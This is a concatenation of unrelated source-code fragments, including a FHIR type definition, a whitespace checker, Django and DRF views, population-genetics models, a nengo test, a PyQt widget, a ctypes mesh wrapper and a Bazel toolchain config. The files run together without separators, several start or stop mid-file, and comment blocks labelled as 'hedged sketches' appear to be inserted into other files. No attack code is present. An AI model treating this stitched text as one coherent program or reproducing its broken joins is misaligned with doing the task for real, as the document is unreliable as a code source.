FHIR_CodeableConcept, # The birth sex of the family member. "sex": FHIR_CodeableConcept, # The actual or approximate date of birth of the relative. "bornPeriod": FHIR_Period, # The actual or approximate date of birth of the relative. "bornDate": str, # Extensions for bornDate "_bornDate": FHIR_Element, # The actual or approximate date of birth of the relative. "bornString": str, # Extensions for bornString "_bornString": FHIR_Element, # The age of the relative at the time the family member history is recorded. "ageAge": FHIR_Age, # The age of the relative at the time the family member history is recorded. "ageRange": FHIR_Range, # The age of the relative at the time the family member history is recorded. "ageString": str, # Extensions for ageString "_ageString": FHIR_Element, # If true, indicates that the age value specified is an estimated value. "estimatedAge": FHIR_boolean, # Extensions for estimatedAge "_estimatedAge": FHIR_Element, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedBoolean": bool, # Extensions for deceasedBoolean "_deceasedBoolean": FHIR_Element, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedAge": FHIR_Age, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedRange": FHIR_Range, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. 
"deceasedDate": str, # Extensions for deceasedDate "_deceasedDate": FHIR_Element, # Deceased flag or the actual or approximate age of the relative at the time of death for the family member history record. "deceasedString": str, # Extensions for deceasedString "_deceasedString": FHIR_Element, # Describes why the family member history occurred in coded or textual form. "reasonCode": List[FHIR_CodeableConcept], # Indicates a Condition, Observation, AllergyIntolerance, or QuestionnaireResponse that justifies this family member history event. "reasonReference": List[FHIR_Reference], # This property allows a non condition-specific note to the made about the related person. Ideally, the note would be in the condition property, but this is not always possible. "note": List[FHIR_Annotation], # The significant Conditions (or condition) that the family member had. This is a repeating section to allow a system to represent more than one condition per resource, though there is nothing stopping multiple resources - one per condition. "condition": List[FHIR_FamilyMemberHistory_Condition], }, total=False, ) import configparser import fnmatch import subprocess import sys def main(): config = configparser.ConfigParser() config.read("setup.cfg") section = "check_whitespace" ignore_files = config.get(section, "ignore_files", fallback="") ignore_files = [s.strip() for s in ignore_files.split(",")] ignore_files = [s for s in ignore_files if s] p = subprocess.run( ["git", "ls-files"], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, check=True, ) filenames = p.stdout.decode().splitlines() failed = False for filename in filenames: if any(True for p in ignore_files if fnmatch.fnmatch(filename, p)): continue try: check(filename) except UnicodeDecodeError: pass except Exception as e: failed = True print("{}: {}".format(filename, e)) return failed def check(filename): last_is_empty = False with open(filename, "r", newline="") as f: for i, line in enumerate(f): if line.endswith("\r") or line.endswith("\r\n"): raise Exception("Carriage returns are not allowed") if not line.endswith("\n"): raise Exception("Missing newline at end of file") try: last_char = line[-2] except IndexError: last_is_empty = True else: if last_char.isspace(): raise Exception("Trailing whitespace at end of line {}".format(i + 1)) last_is_empty = False if last_is_empty: raise Exception("Trailing newlines at end of file") if __name__ == "__main__": sys.exit(int(main())) fluent_pages/management/__init__.py import django from django.db import DEFAULT_DB_ALIAS if django.VERSION >= (1, 8): from django.core.management import CommandError # No longer possible, Django 1.8 always uses the actual model name. def update_model_prefix(model, db=DEFAULT_DB_ALIAS, verbosity=2): raise CommandError("This feature is no longer supported as of Django 1.8") else: from django.contrib.contenttypes.models import ContentType from django.db.models import signals, get_models from django.dispatch import receiver from fluent_pages.models import UrlNode @receiver(signals.post_syncdb) def _on_post_syncdb(app, verbosity=2, db=DEFAULT_DB_ALIAS, **kwargs): """ Prefix the ContentType objects of pagetypes, to make them recognizable. Runs automatically at syncdb, and initial south model creation. """ app_models = [m for m in get_models(app) if issubclass(m, UrlNode)] for model in app_models: update_model_prefix(model, verbosity=verbosity, db=db) def update_model_prefix(model, db=DEFAULT_DB_ALIAS, verbosity=2): """ Internal function to update all model prefixes. 
""" prefix = "pagetype:" ct = ContentType.objects.get_for_model(model) new_name = u"{0} {1}".format(prefix, model._meta.verbose_name_raw).strip() if ct.name != new_name: # Django 1.4/1.5 compatible .save(update_fields=('name',)) look-a-like ContentType.objects.using(db).filter(pk=ct.id).update(name=new_name) if verbosity >= 1: print(" - Updated ContentType title for {0}.{1}".format(model._meta.app_label, model._meta.object_name)) return True return False import numpy as np from moments.LD import Demography from moments.LD.LDstats_mod import LDstats def snm(params=None, rho=None, theta=0.001, pop_ids=None): """ Equilibrium neutral model rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) return Y def two_epoch(params, rho=None, theta=0.001, pop_ids=None): """ Two epoch model params: = (nu,T), where nu is the new population size, integrated for time T rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nu,T = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) Y.integrate([nu], T, rho=rho, theta=theta) return Y def three_epoch(params, rho=None, theta=0.001, pop_ids=None): """ Three epoch model params: = (nu1,nu2,T1,T2), where nus are the population size, integrated for times T1 and T2 rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nu1,nu2,T1,T2 = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) Y.integrate([nu1], T1, rho=rho, theta=theta) Y.integrate([nu2], T2, rho=rho, theta=theta) return Y def growth(params, order=2, rho=0, theta=0.001, pop_ids=None): """ Exponential growth (or decay) model params: = (nuF,T), nu F is the final population size after time T (starting from nu=1) rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nuF,T = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) nu_func = lambda t: [np.exp( np.log(nuF) *t/T)] Y.integrate(nu_func, T, rho=rho, theta=theta) return Y def bottlegrowth(params, ns=200, rho=0, theta=0.001, pop_ids=None): """ Exponential growth (or decay) model after size change params: = (nuB,nuF,T), nu F is the final population size after time T, starting from instantaneous population size change of nuB rho: population-scaled recombination rate (4Nr), given as scalar or list of rhos theta: population-scaled mutation rate (4Nu) """ nuB,nuF,T = params Y = Demography.equilibrium(rho=rho, theta=theta) Y = LDstats(Y, num_pops=1, pop_ids=pop_ids) nu_func = lambda t: [nuB * np.exp( np.log(nuF/nuB) *t/T)] Y.integrate(nu_func, T, rho=rho, theta=theta) return Y ConorPQuinn/NengoDecimal import numpy as np import pytest import nengo from nengo.dists import UniformHypersphere from nengo.utils.connection import target_function @pytest.mark.parametrize("dimensions", [1, 4]) @pytest.mark.parametrize("radius", [1, 2.0]) def test_target_function(Simulator, nl_nodirect, plt, dimensions, radius, seed, rng): eval_points = UniformHypersphere().sample(1000, dimensions, rng=rng) eval_points *= radius f = lambda x: x ** 2 targets = f(eval_points) model = nengo.Network(seed=seed) with model: model.config[nengo.Ensemble].neuron_type = 
nl_nodirect() inp = nengo.Node(lambda t: np.sin(t * 2 * np.pi) * radius) ens1 = nengo.Ensemble(40 * dimensions, dimensions, radius=radius) n1 = nengo.Node(size_in=dimensions) n2 = nengo.Node(size_in=dimensions) transform = np.linspace(1, -1, num=dimensions).reshape(-1, 1) nengo.Connection(inp, ens1, transform=transform) # pass in eval_points and targets nengo.Connection(ens1, n1, **target_function(eval_points, targets)) # same, but let the builder apply f nengo.Connection(ens1, n2, function=f) probe1 = nengo.Probe(n1, synapse=0.03) probe2 = nengo.Probe(n2, synapse=0.03) sim = Simulator(model) sim.run(0.5) plt.subplot(2, 1, 1) plt.plot(sim.trange(), sim.data[probe1]) plt.title('Square manually with target_function') plt.subplot(2, 1, 2) plt.plot(sim.trange(), sim.data[probe2]) plt.title('Square by passing in function to connection') assert np.allclose(sim.data[probe1], sim.data[probe2], atol=0.2 * radius) mafster/easypyqt4 from PyQt4 import QtGui from easypyqt.widget import basicwidget class CollapsibleWidget(basicwidget.BasicWidget): def __init__(self, vertical=True, panel_vertical_layout=True, length=200): super(CollapsibleWidget, self).__init__(vertical=vertical) # Data self.length = length # Widget self.header_widget = HeaderWidget(vertical=not vertical) self.panel_widget = basicwidget.BasicWidget(vertical=panel_vertical_layout) # Layout self.basic_layout.addWidget(self.header_widget) self.basic_layout.addWidget(self.panel_widget) def add_widget_to_header(self, widget): self.header_widget.basic_layout.addWidget(widget) def add_widget_to_panel(self, widget): self.panel_widget.basic_layout.addWidget(widget) if __name__ == '__main__': import sys app = QtGui.QApplication(sys.argv) cw = CollapsibleWidget() cw.header_widget.basic_layout.addWidget(QtGui.QLabel('testo!')) cw.panel_widget.basic_layout.addWidget(QtGui.QLabel('PANO!!')) cw.show() sys.exit(app.exec_()) import ctypes from PIL import Image, ImageOps import numpy as np class meshWrapper(object): def __init__(self, lib_file='./utils/libPythonWrapper.so'): self.lib = ctypes.cdll.LoadLibrary(lib_file) # extern "C" void load_totalmodel(char* obj_file, char* model_file, char* pca_file); self.lib.load_totalmodel.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p] self.lib.load_totalmodel.restype = None self.obj_file = ctypes.create_string_buffer('./utils/mesh_nofeet.obj'.encode('ascii')) self.model_file = ctypes.create_string_buffer('./utils/adam_v1_plus2.json'.encode('ascii')) self.pca_file = ctypes.create_string_buffer('./utils/adam_blendshapes_348_delta_norm.json'.encode('ascii')) self.correspondence_file = ctypes.create_string_buffer('./utils/correspondences_nofeet.txt'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/adam_cocoplus_regressor.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_ls.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_nonneg.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_combined_angjoo1.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/regressor_0n.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_regressor2_nonneg.json'.encode('ascii')) # self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/reg_human36_angjooOrder_regressor2_nonneg_root.json'.encode('ascii')) 
# self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/regressor_0n1.json'.encode('ascii')) self.cocoplus_regressor_file = ctypes.create_string_buffer('./utils/regressor_0n1_root.json'.encode('ascii')) # extern "C" void fit_total3d(double* targetJoint, double* pose, double* coeff, double* trans) self.lib.fit_total3d.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 self.lib.fit_total3d.restype = None self.lib.fit_total2d.argtypes = [ctypes.POINTER(ctypes.c_double)] * 6 self.lib.fit_total2d.restype = None self.lib.fit_total3d2d.argtypes = [ctypes.POINTER(ctypes.c_double)] * 7 self.lib.fit_total3d2d.restype = None # extern "C" void fit_PAF_vec(double* targetJoint2d, double* PAF_vec, double* calibK, double* pose, double* coeff, double* trans, double* face_coeff) self.lib.fit_PAF_vec.argtypes = [ctypes.POINTER(ctypes.c_double)] * 8 + [ctypes.c_uint, ctypes.c_bool, ctypes.c_bool, ctypes.c_bool] self.lib.fit_PAF_vec.restype = None # Eigen::Matrix m_adam_pose; //62 ==TotalModel::NUM_JOINTS # Eigen::Matrix m_adam_coeffs; //30 ==TotalModel::NUM_SHAPE_COEFFICIENTS # Eigen::Vector3d m_adam_t; self.cpose = (ctypes.c_double * (62 * 3))() self.ccoeff = (ctypes.c_double * 30)() self.ctrans = (ctypes.c_double * 3)() self.cface_coeff = (ctypes.c_double * 200)() self.ctarget_array = (ctypes.c_double * ((62 + 70 + 6) * 3))() self.ctarget_array_2d = (ctypes.c_double * ((63 + 70 + 6) * 2))() self.cret_bytes = (ctypes.c_ubyte * (600 * 600 * 4))() self.cfull_bytes = (ctypes.c_ubyte * (1920 * 1080 * 4))() self.cortho_bytes = (ctypes.c_ubyte * (1920 * 1080 * 4))() self.PAF_array = (ctypes.c_double * (63 * 3))() self.out_joint = (ctypes.c_double * (65 * 3))() # regressor 2: 19 (small coco regressor) + 20 (hand) + 20 (hand) + 6 (feet) self.calibK = (ctypes.c_double * 9)() # extern "C" void Total_visualize(GLubyte* ret_bytes, double* targetJoint, uint CameraMode, uint position, bool meshSolid, float scale, int vis_type) self.lib.Total_visualize.argtypes = [ctypes.POINTER(ctypes.c_ubyte), ctypes.POINTER(ctypes.c_double), ctypes.c_uint, ctypes.c_uint, ctypes.c_bool, ctypes.c_float, ctypes.c_int, ctypes.c_bool] self.lib.Total_visualize.restype = None self.lib.VisualizeSkeleton.argtypes = [ctypes.POINTER(ctypes.c_ubyte), ctypes.POINTER(ctypes.c_double), ctypes.c_uint, ctypes.c_uint, ctypes.c_float] self.lib.VisualizeSkeleton.restype = None self.lib.init_renderer.argtypes = [] self.lib.init_renderer.restype = None self.lib.reconstruct_adam.argtypes = [ctypes.POINTER(ctypes.c_double)] * 4 + [ctypes.c_int] self.lib.reconstruct_adam.restype = None self.lib.reconstruct_adam_mesh.argtypes = [ctypes.POINTER(ctypes.c_double)] * 4 + [ctypes.c_int, ctypes.c_bool] self.lib.reconstruct_adam_mesh.restype = None self.lib.fit_h36m_groundtruth.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 self.lib.fit_h36m_groundtruth.restype = None self.lib.adam_refit.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 + [ctypes.c_uint] self.lib.adam_refit.restype = None self.lib.adam_sequence_init.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 + [ctypes.c_uint] self.lib.adam_sequence_init.restype = None self.lib.adam_hsiu_fit_dome.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 + [ctypes.c_bool] self.lib.adam_hsiu_fit_dome.restype = None def reset_value(self): self.ctrans[:] = [0.0, 0.0, 500.0] self.ccoeff[:] = [0.0] * 30 self.cpose[:] = [0.0] * (62 * 3) self.cface_coeff[:] = [0.0] * 200 def load_totalmodel(self): self.lib.load_totalmodel(self.obj_file, self.model_file, self.pca_file, self.correspondence_file, 
self.cocoplus_regressor_file) def fit_total3d(self, joint3d): assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:joint3d.size] = joint3d.reshape(-1).tolist() self.lib.fit_total3d(self.ctarget_array, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff) def total_visualize(self, cameraMode=0, target=True, first_render=False, position=0, meshSolid=True, scale=1.0, vis_type=1, show_joint=True): if cameraMode == 0: read_buffer = self.cret_bytes read_size = (600, 600) elif cameraMode == 1: read_buffer = self.cfull_bytes read_size = (1920, 1080) else: assert cameraMode == 2 read_buffer = self.cortho_bytes read_size = (1920, 1080) if first_render: self.lib.Total_visualize(read_buffer, self.ctarget_array if target else None, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_bool(meshSolid), ctypes.c_float(scale), ctypes.c_int(vis_type), ctypes.c_bool(show_joint)) read_buffer[:] = [0] * len(read_buffer[:]) self.lib.Total_visualize(read_buffer, self.ctarget_array if target else None, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_bool(meshSolid), ctypes.c_float(scale), ctypes.c_int(vis_type), ctypes.c_bool(show_joint)) img = bytes(read_buffer[:read_size[0] * read_size[1] * 4]) img = Image.frombytes("RGBA", read_size, img) img = ImageOps.flip(img) return img def fit_total2d(self, joint2d, K): assert joint2d.shape[1] == 2, joint2d.shape assert K.shape == (3, 3), K self.calibK[:] = K.reshape(-1).tolist() self.ctarget_array_2d[:] = joint2d.reshape(-1).tolist() self.lib.fit_total2d(self.ctarget_array_2d, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff) def fit_total3d2d(self, joint3d, joint2d, K): assert joint3d.shape[1] == 3, joint3d.shape assert joint2d.shape[1] == 2, joint2d.shape assert K.shape == (3, 3), K self.ctarget_array[:joint3d.size] = joint3d.reshape(-1).tolist() self.ctarget_array_2d[:] = joint2d.reshape(-1).tolist() self.calibK[:] = K.reshape(-1).tolist() self.lib.fit_total3d2d(self.ctarget_array, self.ctarget_array_2d, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff) def visualize_skeleton(self, joint3d, cameraMode=0, first_render=False, position=0, scale=1.0): if cameraMode == 0: read_buffer = self.cret_bytes read_size = (600, 600) elif cameraMode == 1: read_buffer = self.cfull_bytes read_size = (1920, 1080) else: assert cameraMode == 2 read_buffer = self.cortho_bytes read_size = (1920, 1080) read_buffer[:] = [0] * len(read_buffer[:]) assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:joint3d.size] = joint3d.reshape(-1).tolist() if first_render: self.lib.VisualizeSkeleton(read_buffer, self.ctarget_array, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_float(scale)) self.lib.VisualizeSkeleton(read_buffer, self.ctarget_array, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_float(scale)) img = bytes(read_buffer[:read_size[0] * read_size[1] * 4]) img = Image.frombytes("RGBA", read_size, img) img = ImageOps.flip(img) return img def fit_PAF_vec(self, joint2d, PAF_vec, K, joint3d=None, regressor_type=0, quan=False, fitPAFfirst=False, fit_face_exp=False): assert joint2d.shape == (139, 2), joint2d.shape assert K.shape == (3, 3), K assert PAF_vec.shape[1] == 3, PAF_vec.shape assert PAF_vec.shape[0] == 63, PAF_vec.shape if joint3d is not None: assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:] = joint3d.reshape(-1).tolist() self.calibK[:] = K.reshape(-1).tolist() self.ctarget_array_2d[:] = [0.0] * len(self.ctarget_array_2d[:]) self.ctarget_array_2d[:joint2d.shape[0] * 
2] = joint2d.reshape(-1).tolist() self.PAF_array[:PAF_vec.size] = PAF_vec.reshape(-1).tolist() self.lib.fit_PAF_vec(self.ctarget_array_2d, self.PAF_array, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, None if joint3d is None else self.ctarget_array, ctypes.c_uint(regressor_type), ctypes.c_bool(quan), ctypes.c_bool(fitPAFfirst), ctypes.c_bool(fit_face_exp)) def adam_refit(self, joint3d, regressor_type): assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:] = joint3d.reshape(-1).tolist() self.lib.adam_refit(self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, self.ctarget_array, regressor_type) def adam_sequence_init(self, joint3d, regressor_type): assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:] = joint3d.reshape(-1).tolist() self.lib.adam_sequence_init(self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, self.ctarget_array, regressor_type) def adam_hsiu_fit_dome(self, target_joint, freeze_shape=False): assert target_joint.shape == (20, 3) self.ctarget_array[:60] = target_joint.reshape(-1).tolist() self.lib.adam_hsiu_fit_dome(self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, self.ctarget_array, freeze_shape) def refit_eval_h36m(self, regressor_type, prior_weight=1.0): # refit Adam using skeleton reconstructed from current params, update params with pose prior && AngleAxis self.lib.refit_eval_h36m(self.cpose, self.ccoeff, self.ctrans, ctypes.c_uint(regressor_type), ctypes.c_double(prior_weight)) def fitSingleStage(self, joint2d, PAF_vec, K, regressor_type=0, fit_face_exp=False): assert joint2d.shape == (139, 2), joint2d.shape assert K.shape == (3, 3), K assert PAF_vec.shape[1] == 3, PAF_vec.shape assert PAF_vec.shape[0] == 63, PAF_vec.shape self.calibK[:] = K.reshape(-1).tolist() self.ctarget_array_2d[:] = [0.0] * len(self.ctarget_array_2d[:]) self.ctarget_array_2d[:joint2d.shape[0] * 2] = joint2d.reshape(-1).tolist() self.PAF_array[:PAF_vec.size] = PAF_vec.reshape(-1).tolist() self.lib.fitSingleStage(self.ctarget_array_2d, self.PAF_array, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, ctypes.c_uint(regressor_type), ctypes.c_bool(fit_face_exp)) 1000+ load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES") load( "@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl", "feature", "flag_group", "flag_set", "tool_path", ) all_link_actions = [ ACTION_NAMES.cpp_link_executable, ACTION_NAMES.cpp_link_dynamic_library, ACTION_NAMES.cpp_link_nodeps_dynamic_library, ] all_compile_actions = [ ACTION_NAMES.assemble, ACTION_NAMES.c_compile, ACTION_NAMES.clif_match, ACTION_NAMES.cpp_compile, ACTION_NAMES.cpp_header_parsing, ACTION_NAMES.cpp_module_codegen, ACTION_NAMES.cpp_module_compile, ACTION_NAMES.linkstamp_compile, ACTION_NAMES.lto_backend, ACTION_NAMES.preprocess_assemble, ] def _impl(ctx): tool_paths = [ tool_path( name = "ar", path = "wrappers/aarch64-none-linux-gnu-ar", ), tool_path( name = "cpp", path = "wrappers/aarch64-none-linux-gnu-cpp", ), tool_path( name = "gcc", path = "wrappers/aarch64-none-linux-gnu-gcc", ), tool_path( name = "gcov", path = "wrappers/aarch64-none-linux-gnu-gcov", ), tool_path( name = "ld", path = "wrappers/aarch64-none-linux-gnu-ld", ), tool_path( name = "nm", path = "wrappers/aarch64-none-linux-gnu-nm", ), tool_path( name = "objdump", path = "wrappers/aarch64-none-linux-gnu-objdump", ), tool_path( name = "strip", path = "wrappers/aarch64-none-linux-gnu-strip", ), ] default_compiler_flags = feature( name = "default_compiler_flags", enabled = True, flag_sets = [ 
flag_set( actions = all_compile_actions, flag_groups = [ flag_group( flags = [ "-no-canonical-prefixes", "-fno-canonical-system-headers", "-Wno-builtin-macro-redefined", "-D__DATE__=\"redacted\"", "-D__TIMESTAMP__=\"redacted\"", "-D__TIME__=\"redacted\"", ], ), ], ), ], ) default_linker_flags = feature( name = "default_linker_flags", enabled = True, flag_sets = [ flag_set( actions = all_link_actions, flag_groups = ([ flag_group( flags = [ "-lstdc++", ], ), ]), ), ], ) features = [ default_compiler_flags, default_linker_flags, ] return cc_common.create_cc_toolchain_config_info( ctx = ctx, cxx_builtin_include_directories = [ "/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/include/c++/10.2.1/", "/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/usr/include/", "/proc/self/cwd/external/aarch64-none-linux-gnu/lib/gcc/aarch64-none-linux-gnu/10.2.1/include/", "/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/lib/", ], features = features, toolchain_identifier = "aarch64-toolchain", host_system_name = "local", target_system_name = "unknown", target_cpu = "unknown", target_libc = "unknown", compiler = "unknown", abi_version = "unknown", abi_libc_version = "unknown", tool_paths = tool_paths, ) cc_toolchain_config = rule( implementation = _impl, attrs = {}, provides = [CcToolchainConfigInfo], ) # -*- coding:utf-8 -*- from django.contrib.auth.models import User, Group from rest_framework import viewsets, status, mixins, generics, permissions, reverse from rest_framework.decorators import api_view from rest_framework.response import Response # 导入Response from rest_framework.status import HTTP_404_NOT_FOUND from rest_framework.views import APIView from quickstart.models import Snippet from quickstart.permissions import IsOwnerOrReadOnly from .serializers import UserSerializer, GroupSerializer, SnippetSerializer class UserViewSet(viewsets.ReadOnlyModelViewSet): """ 允许用户查看或编辑的API路径。 """ queryset = User.objects.all().order_by('-date_joined') serializer_class = UserSerializer # def get_object(self): # return self.request.user class GroupViewSet(viewsets.ModelViewSet): """ 允许组查看或编辑的API路径。 """ queryset = Group.objects.all() serializer_class = GroupSerializer # class SnippetList(mixins.ListModelMixin, # mixins.CreateModelMixin, # generics.GenericAPIView): class SnippetList(generics.ListCreateAPIView): """ 列出所有的snippets或者创建一个新的snippet。 """ queryset = Snippet.objects.all() serializer_class = SnippetSerializer permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,) # def get(self, request, format=None): # snippets = Snippet.objects.all() # serializer = SnippetSerializer(snippets, many=True) # return Response(serializer.data) # def post(self, request, format=None): # serializer = SnippetSerializer(data=request.data) # if serializer.is_valid(): # serializer.save() # return Response(serializer.data, status=status.HTTP_201_CREATED) # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) # def get(self, request, *args, **kwargs): # return self.list(request, *args, **kwargs) # # def post(self, request, *args, **kwargs): # return self.create(request, *args, **kwargs) class SnippetDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView): """ 检索,更新或删除一个snippet示例。 """ queryset = Snippet.objects.all() serializer_class = SnippetSerializer def get(self, request, *args, **kwargs): return self.retrieve(request, *args, **kwargs) def put(self, request, *args, 
**kwargs): return self.update(request, *args, **kwargs) def delete(self, request, *args, **kwargs): return self.destroy(request, *args, **kwargs) # def get_object(self, pk): # try: # return Snippet.objects.get(pk=pk) # except Snippet.DoesNotExist: # raise HTTP_404_NOT_FOUND # # def get(self, request, pk, format=None): # snippet = self.get_object(pk) # serializer = SnippetSerializer(snippet) # return Response(serializer.data) # # def put(self, request, pk, format=None): # snippet = self.get_object(pk) # serializer = SnippetSerializer(snippet, data=request.data) # if serializer.is_valid(): # serializer.save() # return Response(serializer.data) # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) # # def delete(self, request, pk, format=None): # snippet = self.get_object(pk) # snippet.delete() # return Response(status=status.HTTP_204_NO_CONTENT) from django.contrib.auth.models import User class UserList(generics.ListAPIView): queryset = User.objects.all() serializer_class = UserSerializer class UserDetail(generics.RetrieveAPIView): queryset = User.objects.all() serializer_class = UserSerializer class UserRetiveViewset(mixins.RetrieveModelMixin, viewsets.GenericViewSet): queryset = User.objects.all() serializer_class = UserSerializer # @api_view(['GET']) # def api_root(request, format=None): # return Response({ # 'users': reverse('sa', request=request, format=format), # 'snippets': reverse('sad', request=request, format=format) # }) team23/django_t10e import inspect from django.db.models.manager import Manager as _Manager from django.utils import six class Manager(_Manager): # Ported from Django 1.8 @classmethod def _get_queryset_methods(cls, queryset_class): def create_method(name, method): def manager_method(self, *args, **kwargs): return getattr(self.get_queryset(), name)(*args, **kwargs) manager_method.__name__ = method.__name__ manager_method.__doc__ = method.__doc__ return manager_method new_methods = {} # Refs http://bugs.python.org/issue1785. predicate = inspect.isfunction if six.PY3 else inspect.ismethod for name, method in inspect.getmembers(queryset_class, predicate=predicate): # Only copy missing methods. if hasattr(cls, name): continue # Only copy public methods or methods with the attribute `queryset_only=False`. queryset_only = getattr(method, 'queryset_only', None) if queryset_only or (queryset_only is None and name.startswith('_')): continue # Copy the method onto the manager. 
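# --- Hedged sketch (not taken from this repo): the urls.py wiring commonly used with
# the DRF views above. The module path `quickstart.views` and URL names are assumptions.
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from quickstart import views

router = DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)

urlpatterns = [
    path('', include(router.urls)),
    path('snippets/', views.SnippetList.as_view(), name='snippet-list'),
    path('snippets/<int:pk>/', views.SnippetDetail.as_view(), name='snippet-detail'),
]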
new_methods[name] = create_method(name, method) return new_methods @classmethod def from_queryset(cls, queryset_class, class_name=None): if class_name is None: class_name = '%sFrom%s' % (cls.__name__, queryset_class.__name__) class_dict = { '_queryset_class': queryset_class, } class_dict.update(cls._get_queryset_methods(queryset_class)) return type(class_name, (cls,), class_dict) #!/usr/bin/env python3 def createPlanet(pname,name=''): from isceobj.Planet.Planet import Planet return Planet(name=name,pname=pname) 1-10 import os from datetime import datetime from jinja2 import Environment, FileSystemLoader from mrgenerator import utils, infos def write_readme(name=None, path=None): path = utils.get_path_directory() if path is None else path name = "README.md" if name is None else name env = Environment(loader=FileSystemLoader(utils.get_templates_dir())) template = env.get_template('default.pmd') filename = os.path.join(path, name) with open(filename, 'w', encoding='utf-8') as fh: fh.write(template.render( data=infos.get_info_readme(), datetime=datetime )) # # tests/middleware/test_session.py # import uuid import pytest import growler from unittest import mock from growler.middleware import session @pytest.fixture def mock_backend(): try: from unittest.mock import AsyncMock except ImportError: AsyncMock = None if not AsyncMock: mock = pytest.importorskip('mock') AsyncMock = mock.AsyncMock return AsyncMock() @pytest.fixture def sess(mock_backend): return session.Session(mock_backend) def test_sess_fixture(sess): assert isinstance(sess, session.Session) def test_getters_and_setters(sess): data = 'foo' sess['data'] = data assert sess['data'] is data assert sess.get('data') is data assert sess.get('notFound') is None assert len(sess) == 1 for i in sess: assert i == 'data' del sess['data'] assert 'data' not in sess assert len(sess) == 0 @pytest.mark.asyncio async def test_session_save(sess, mock_backend): await sess.save() mock_backend.save.assert_called_with(sess) @pytest.fixture def storage(): return session.DefaultSessionStorage() def test_storage_fixture(storage): assert isinstance(storage, session.DefaultSessionStorage) def test_defaultstorage_call_nocookie(storage): name = 'Fooo' storage.session_id_name = name req, res = mock.MagicMock(), mock.MagicMock() req.cookies = {} storage(req, res) assert isinstance(req.session, session.Session) assert isinstance(req.cookies[name], uuid.UUID) def test_defaultstorage_call(storage): req, res = mock.MagicMock(), mock.MagicMock() storage(req, res) assert isinstance(req.session, session.Session) def test_defaultstorage_save(storage): m = mock.MagicMock() storage.save(m) assert storage._sessions[m.id] is m._data """Database models.""" import short_url from flask import current_app, url_for from flask_sqlalchemy import BaseQuery from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy_searchable import SearchQueryMixin, make_searchable from sqlalchemy_utils.types import TSVectorType from werkzeug.security import check_password_hash, generate_password_hash from aggrep import db from aggrep.utils import decode_token, encode_token, now make_searchable(db.metadata) class PKMixin: """Mixin that adds a primary key to each model.""" __table_args__ = {"extend_existing": True} id = db.Column(db.Integer, primary_key=True) class CRUDMixin: """Mixin that adds convenience methods for CRUD (create, read, update, delete) operations.""" @classmethod def create(cls, **kwargs): """Create a new record and save it the database.""" instance = cls(**kwargs) return 
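# --- Hedged usage sketch for the backported Manager.from_queryset defined above;
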